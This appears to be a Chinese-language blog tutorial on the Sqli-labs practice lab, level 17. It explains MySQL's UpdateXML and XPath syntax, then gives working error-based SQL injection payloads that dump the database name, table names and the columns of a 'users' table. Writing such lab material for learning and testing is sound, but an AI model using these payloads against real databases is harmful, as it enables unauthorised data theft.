Sqli-labs第十七关之UpdateXML

已于 2022-09-13 21:29:09 修改
阅读量721 收藏 2
点赞数
分类专栏: sqlmap 文章标签: 数据库
于 2022-08-28 12:55:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39511050/article/details/126563908
版权

在测试Sqli-labs第十七关的时候遇到了updatexml函数,针对自己的初步了解进行总结,方便以后回顾

UpdateXML函数具有查询功能通常是与concat一起使用,是在xpath处查询,xpath有自己的语法,利用此规则构造错误语法就会将他查询的结果已报错的形式显示出来

就是说界面有错误信息反显的时候就可以用这个函数尝试

语法

UpdateXML(xml_target, xpath_expr, new_xml)

第一个参数是目标是针对于xml文档

第二参数是xpath的表达,这里可以看下xpath教程: http://www.w3school.com.cn/xpath/

第三个参数是将xpath表达式转换成什么,也就是替换查找到的符合条件的数据

第二个参数表达式说明:
在这里插入图片描述

示例

绝对路径示例 ‘/’

示例1
 select UpdateXML('<a><b>ccc</b><d></d></a>', '/a', '<e>fff</e>')  ;

在这里插入图片描述
解析:
/是从根节点选取,由于sql中的xml根节点就是a所以查询成功,就对标签以及其中的全部内容进行替换成第三个参数的值,若a标签没有结束标签即则替换不成功,查询结果为null

示例2
 select UpdateXML('<a><b>ccc</b><d></d></a>', '/b', '<e>fff</e>')  ;

在这里插入图片描述
解析:
/是从根节点选取,由于xml根节点是a而不是b所以不成功,就对不会对标签d的内容进行替换,结果还是参数1的值

示例3
 select UpdateXML('<a><b>bbbb</b><d></d></a>', '/a/d', '<e>fff</e>')  ;

在这里插入图片描述
解析:
语法为:/元素/子元素/孙元素,
其含义为从根元素开始一级一级向下查找不能跨级。
/a/b表示从绝对路径中获取从a为根节点的下一级b节点,查找到就将b节点及内容替换成参数3的值

全文搜索 ‘//’

示例1
 select UpdateXML('<a><b>bbbb</b><d></d></a>', '//b', '<e>fff</e>')  ;

在这里插入图片描述
解析:
//在xml文档中全文查找,b是xml中的第二个标签于是把b标签以及标签中的内容全部替换成第三个参数的值其他内容不变,结果为截图中红色内容。同理第二个参数为//a也会替换成功,结果为第三个参数的值
也可用于//b/d 含义:全文查找b无论在哪一级,d必须是b下的子节点
也可用于//b//d 含义:全文查找b无论在哪一级,d只要是b的子或孙节点都行

相对路径的语法 ‘./子元素/孙元素’

示例1
 select UpdateXML('<a><b>bbbb</b><d></d></a>', './a/b', '<e>fff</e>')  ;

在这里插入图片描述
解析:
./a/b表示相对路径,从根路径找a下的子节点b然后替换成参数3的内容

在这里插入图片描述
./b/o就不成功,.//b/o就会成功,个人觉得加上.没啥用呢跟//b/o的结果一样啊,这没研究明白后续补充吧

属性查找

语法

在这里插入图片描述

示例1
 select UpdateXML('<a><b><o name="oo">ooo</o></b><d></d></a>', '//@name', '<e>fff</e>')

在这里插入图片描述
解析:
o标签中有个name属性,//@name表示在xml中查找只要有这个name属性就替换成第三个参数的值
待办:若多个标签中都有name属性就不会替换成功,不知道为啥,后续在研究吧

示例2
 select UpdateXML('<a><b><o name="oo">ooo</o><z name="oo">zz</z></b><d></d></a>', '//o[@name]', '<e>fff</e>')

在这里插入图片描述
解析:
查找元素名为o且属性名为name的标签,查到后替换成第三个参数

示例3
 select UpdateXML('<a><b><o name="oo">ooo</o><z name="oo">zz</z></b><d></d></a>', '//o[@name="oo"]', '<e>fff</e>')

在这里插入图片描述
解析:
查找元素名为o 属性名为name且属性值为oo的标签,查到后替换成第三个参数

Sqli-labs第十七关payload

1‘ and updatexml(1,concat(‘~’,(select database())),1)
xpath语法中不支持~就会报错,还会将执行后的sql结果返回,只需将编写好的sql语句替换就可以得到想要的结果
如下:
在这里插入图片描述

 1' and  updatexml(1,concat('~',(select GROUP_CONCAT(table_name) from information_schema.tables where table_schema='security')),1)

在这里插入图片描述

123' and ( updatexml(1,concat('~',(select GROUP_CONCAT(column_name) from information_schema.columns where table_schema=database() and table_name='users')),1))#

在这里插入图片描述

火腿肠
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
sqlilabs第17关
wh1sper、的博客
04-29 1272
sqlilabs第17关一、分析二、手注 一、分析 这关题目叫做基于报错的更新查新。 遇事不决,就直接看源码。 通过源码我们得知当我们输入数据进去时,会先查询users表与我们输入进去的用户名对比。 如果没有这个用户,就会告诉你。(这肯定忍不了) 相反他会检查用户名。 在check_input中,我贴了函数的链接,师傅们比我总结的详细。 get_magic_quotes_gpc()函数 ctype_digit()函数 二、手注 ...
sqli-labs 17
m0_69548793的博客
08-27 1328
sqli-labs 17
SQLI-labs-第十七
weixin_54055099的博客
05-16 962
Sqli-labs第十七关,二次注入、报错注入
SQL注入之updatexml报错注入(函数解释)
最新发布
m0_74608722的博客
06-05 678
第二个参数 xml路径 是可操作的地方,xml文档中路径是用 /xxx/xxx/xxx/…这种格式,如果我们写入其他格式,就会报错,并且会返回我们写入的非法格式内容,而这个非法的内容就是我们想要查询的内容。原因:是因为updatexml(1,database(),1)这种书写的语法格式是正确的,所以不会爆出语法错误,在SQL注入中无法得到想要的库、表、列名(为了得到他们,应该怎样书写呐?正常查询 第二个参数的格式为 /xxx/xx/xx/xx ,即使查询不到也不会报错。
sqli-labs第十七
m0_73248913的博客
02-11 343
sqli-labs第十七关教程
sqli-labs第十七关详解
金 帛的博客
04-26 4183
sqlilabs第十七关详解
sqli-labs第七关
学习
08-24 1070
在第五六关卡了好几天,终于走到第七关了,首先查看源代码可以看到,SQL查询语句为SELECT * FROM users WHERE id=(('3' )) -- ')) LIMIT 0,1 于是构造绕过语句 192.168.18.136/sqli-labs-master/Less-7/?id=3' )) --+ 接下来,我们发现 union 1,2,3一点用都没有 ...
sqli-labs(15-19关)
weixin_55843787的博客
04-16 3079
sqli-labs靶场过关 源码分析
Sqli-labs-master超详细通关教程(1-23关基础篇)
m0_67391270的博客
06-12 3215
一到四关主要是参数被包装的问题。一般用于尝试的语句Ps:–+可以用#替换,url 提交过程中 Url 编码后的#为%23and1=2–+'and1=2–+"and1=2–+)and1=2–+')and1=2–+")and1=2–+"))and1=2–+图中显示的sql语句是我为了方便理解,修改了源代码显示出的id =1 and 1=2页面正常,考虑是否有字符注入,先加单引号可以看到提示,存在’ '包装,我们加上–+http://127.0.0.1:8080/sqli-labs-master/Less-1/?
sql注入-sqli-labs第17关
weixin_46784800的博客
11-10 1640
sqli-labs第17关 updatexml使用 第17关的关键函数为updatexml函数: UpdateXML(xml_target, xpath_expr, new_xml) 其中,xml_target作用为目标xml,xpath_expr作用为xpath语法,new_xml为要替换掉的xml内容,所以该函数能够用于注入的原因为,当xpath语法不合规时,会报错,实现报错注入。 updatexml(0,concat(0x7e, (select col2 from tableA limit 0,1),
最详细sqli-labs平台前十关讲解
妙蛙种子吃了都会妙妙秒的妙脆角的博客
01-10 3251
最详细sqli-labs平台sql注入语法讲解 文章目录最详细sqli-labs平台sql注入语法讲解一、sql注入的简单介绍二、sqli-labs平台的搭建二、实验1.Less-1(single quotes)2.Less-2(intiger based)3.Less-3(single quotes with twist)4.Less-4(double quotes)5.Less-5 最近也是沉迷于学习sql注入,越是了解越是发现其中的奥妙与乐趣,在这篇文章中主要是以sqli-labs平台为例子,记录一些
update.xml
07-07
软件更新升级 <?xml version="1.0" encoding="utf-8" ?> <Update> <Soft Name="BlogWriter"> <Verson>1.0.1.2</Verson> <DownLoad>http://www.csdn.net/BlogWrite.rar</DownLoad> </Soft> </Update>
MYSQL updatexml()函数报错注入解析
09-09
主要介绍了MYSQL updatexml()函数报错注入解析,并且简单介绍了updatexml函数,具有一定参考价值,需要的朋友可以了解下。
sqli-labs注入——sqli-labs的1-65关闯关指南
qq_51366383的博客
01-27 1673
sqli-labs图片上一共有75关,但是下载的资料都只有65关,所以只写了65关,本文仅是个人想法,如有不对请多谅解。 前面三部分的数据为:security 1、Emails Id ,email_id 2、referers 3、Uagents id,uagent,ip_address,username 4、Users id,username,password password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,
sqli-labs 第十七
qq_64302290的博客
05-13 937
(2)当前面的输入的密码 为整数时,之所以可以被执行,是因为当我们输入的为整数时相当与给后面的语句加上了一个括号,并且有限执行括号中的内容。可以发现,这里使用update语句来修改用户的密码,并且对我们输入的用户名进行了过滤但并没有对密码进行过滤。大家可以看到在最后注入具体值的时候我们使用的是floor进行注入,是因为当我们使用updatexml进行注入时会爆下面的问题: 等我查阅资料后回来改正。经过我们的测试,当在密码出输入一个单引号时就会出现报错,对此注入点可能就在该位置。我们接着上面测试注入表名。
UpdateXML
weixin_34198797的博客
01-19 224
//取出xml文件的全路径 string path = Server.MapPath("App_Data/new.xml"); //导入XML文件 XElement xe = XElement.Load(path); //用LINQ查找要修改的元素 IEnumerable<XElement> element = fr...
sqli-labs靶场第十七
gou1791241251的博客
12-27 895
十七关有点特别,让我重置密码,但是注入的原理还是一样的。 在输入用户名的地方,我尝试了单引号,双引号,不输入,等测试去判断闭合方式,最终没有得到想要的结果 后来在输入密码的地方尝试了同样的操作,最终结果都是一样。。 实在没有了头绪我选择了代码审计! 在代码中可以看到,先是处理账号,如果账号存在,则才能重置密码,也就是说,如果账号不存在,输入密码也是没用的 在这里我们可以看到,后台接收到uname参数时,调用了一个函数进行过滤了用户输入的内容。但是没有对密码进行过滤,所以密码框才是真正的注入点 如果输入内容
SQL-labs的第17关——报错注入(updatexml
qq_73393033的博客
07-20 516
这一关的网站是用来修改密码的,所以数据库会执行update这种查询方式,而不是select这种查询方式。我们发现用户名这一框输入数据不行,会进行过滤。所以我们这次在密码这一框中进行注入。
sqli-labs-----第17关
wyzhxhn的博客
11-10 813
基于报错的更新查新。
sqli-labs闯关
10-09
很高兴为您解答关于sqli-labs闯关的问题!sqli-labs是一个用于学习和实践SQL注入的实验室。通过完成各个关卡,您将能够了解和掌握SQL注入的不同技术和攻击方法。 要开始sqli-labs闯关,您可以按照以下步骤进行: 1...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值